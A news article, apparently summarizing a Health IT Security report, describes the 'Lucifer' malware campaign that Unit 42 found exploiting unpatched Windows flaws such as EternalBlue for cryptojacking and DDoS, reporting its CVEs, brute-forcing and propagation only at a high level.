Hackers are targeting unpatched critical Windows vulnerabilities using a new malware called "Lucifer" capable of DDoS and cryptojacking. According to Health IT Security's latest report, the new malware campaign was identified by the Palo Alto Network's Unit 42 research team.
The report stated that the new malware focuses on a long list of unpatched, high, and critical Windows vulnerabilities for both cryptojacking and denial-of-service attacks (DDoS).
Also Read: [HACKER] $200 Million Worth of Cryptocurrency Stolen by CryptoCore Hacker Targetting Cryptocurrency Exchanges
According to Health IT Security's previous report, the self-propagating malware could prove problematic since Windows could be burdened with a host of patching issues. On May 29, the researchers discovered a new variant of hybrid crypto-jacking malware which was spotted exploiting a vulnerability found in Laravel Framework 5.7.x.
Vulnerable Windows hosts are also targeted by the new malware equipped with a series of exploits, as claimed by the researcher's analysis of the variant. The hackers began spreading an upgraded version of the malware after the first campaign ended on June 10, resuming the following day.
From dropping XMRig for cryptojacking, the researchers explained that Lucifer is also capable of leveraging the command and control (C2) operation to self-propagate by exploiting a host of vulnerabilities.
Unpatched Windows vulnerabilities targetted by new malware
According to the Health IT Security, credential brute-forcing is employed by the Lucifer hackers, as well as running DoublePulsar, EternalBlue, and EternalRomance backdoor against vulnerable targets for intranet infections. The global WannaCry cyberattack which took place in 2017 used the EternalBlue exploit. 40% of healthcare providers faced a WannaCry attack during the first half of 2019.
CVE-2017-0145 and CVE-2017-0144 found in the SMBv1 server of some Microsoft Windows platforms, Apache Struts' flaw CVE-2017-9791, as well as CVE-2017-8464 found in some Windows Server versions, are included in an exhaustive list leveraged by the Lucifer hackers.
Because of their trivial-to-exploit nature and their tremendous impact inflicted on the victim, the targeted vulnerabilities all have high and critical ratings. To target both externally and internally, both open TCP ports 135 (RCP) and 1433 (MSSQL) are scanned by the malware.
Using the embedded password list and the default username administrator before running and copying the malware binary on the remote host after successful authentication, the malware brute-forces the login If the port is open.
"Once exploited, the attacker can execute arbitrary commands on the vulnerable device," said the security researchers. "In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation."
Using its anti-sandbox capability, the upgraded version of the Lucifer malware is able to check the computer name and username of the infected host.